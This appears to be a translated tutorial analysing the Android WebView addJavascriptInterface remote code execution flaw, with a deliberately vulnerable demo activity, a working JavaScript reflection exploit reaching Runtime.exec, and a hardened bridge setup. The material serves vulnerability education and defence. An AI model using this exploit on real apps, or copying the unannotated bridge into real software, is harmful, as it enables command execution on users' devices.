0x00
This article analyzes the Android WebView remote code execution vulnerability. The code is at https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo. Let's analyze the code below.
0x01
First, the project directory layout:
The code for MainActivity.java is as follows:
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.JsResult;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.widget.Toast;

public class MainActivity extends Activity {
    private WebView webView;
    private Uri mUri;
    private String url;
    // String mUrl1 = "file:///android_asset/html/attack_file.html";
    String mUrl2 = "file:///android_asset/html/test.html";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.webview);
        webView.getSettings().setJavaScriptEnabled(true);
        // The bridge object is exposed to page JavaScript under the name "JSInterface".
        webView.addJavascriptInterface(new JSInterface(), "JSInterface");
        // webView.getSettings().setAllowFileAccessFromFileURLs(true);
        webView.setWebChromeClient(new WebChromeClient() {
            @Override
            public boolean onJsAlert(WebView view, String url, String message, JsResult result) {
                // Required functionality here
                return super.onJsAlert(view, url, message, result);
            }
        });
        webView.loadUrl(mUrl2);
    }

    // No @JavascriptInterface annotations: on WebViews that predate API 17 every public
    // method of this object, including the inherited Object.getClass(), is callable from JS.
    class JSInterface {
        public String onButtonClick(String text) {
            final String str = text;
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Log.e("leehong2", "onButtonClick: text = " + str);
                    Toast.makeText(getApplicationContext(), "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();
                }
            });
            return "This text was returned from Java layer. JS text = " + text;
        }

        public void onImageClick(String url, int width, int height) {
            final String str = "onImageClick: text = " + url + " width = " + width + " height = " + height;
            Log.i("leehong2", str);
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();
                }
            });
        }
    }
}
The following two lines enable JavaScript in the WebView and inject a Java object into the loaded HTML so that page scripts can call its methods:
webView.getSettings().setJavaScriptEnabled(true);
webView.addJavascriptInterface(new JSInterface(), "JSInterface");
We then look at the HTML file that gets loaded; it lives in the assets directory.
webView.loadUrl(mUrl2);
test.html is as follows:
For an introduction to HTML and JavaScript, see http://www.w3school.com.cn/html/html_getstarted.asp. The root cause of the vulnerability is the following code:
function execute(cmdArgs) {
    // Walk every global; an injected Java object is one that exposes getClass().
    for (var obj in window) {
        console.log(window[obj]);
        if ("getClass" in window[obj]) {
            alert(obj);
            // Reflection chain: Class.forName -> Runtime.getRuntime() -> Runtime.exec(cmdArgs)
            return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmdArgs);
        }
    }
}
var p = execute(["ls", "/mnt/sdcard/"]);
An attacker can iterate over the objects injected into the page, find one that exposes a getClass method, use Java reflection to reach java.lang.Runtime, invoke its static getRuntime method, and then call exec to run a system command, with whatever damage that entails. To see the full behaviour of this program, download the code and run it.
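For contrast, here is a hardened version of the bridge setup from MainActivity, written as an added example that is not part of the demo project: only methods carrying @JavascriptInterface are reachable from page scripts, the bridge is withheld on platforms that do not honour the annotation, and the file:// access settings the demo leaves loose are closed. The class name SafeBridgeSetup and the method installBridge are assumed names; JSInterface and the method signatures follow the page.

```java
import android.annotation.SuppressLint;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;

public final class SafeBridgeSetup {

    /** Bridge object: with the annotation, only the marked methods are visible to JS. */
    public static class JSInterface {
        @JavascriptInterface
        public String onButtonClick(String text) {
            return "This text was returned from Java layer. JS text = " + text;
        }

        // Unannotated, so page scripts cannot call it (nor getClass()) on API 17+.
        public void internalHelper() { }
    }

    /**
     * Installs the bridge only where @JavascriptInterface is enforced (API 17,
     * JELLY_BEAN_MR1, and later). The app must also declare targetSdkVersion >= 17;
     * otherwise the platform still exposes every public method for compatibility.
     * Returns false when the bridge was deliberately not injected.
     */
    @SuppressLint("SetJavaScriptEnabled")
    public static boolean installBridge(WebView webView) {
        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR1) {
            // Older WebViews expose all public methods, so never inject a bridge here.
            return false;
        }
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);
        // Stop file:// pages (like the demo's test.html) from reading other local files.
        settings.setAllowFileAccess(false);
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);
        // Drop the bridge objects the framework itself injects on some builds.
        webView.removeJavascriptInterface("searchBoxJavaBridge_");
        webView.removeJavascriptInterface("accessibility");
        webView.removeJavascriptInterface("accessibilityTraversal");
        webView.addJavascriptInterface(new JSInterface(), "JSInterface");
        return true;
    }
}
```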
A brief analysis of the Android WebView remote code execution vulnerability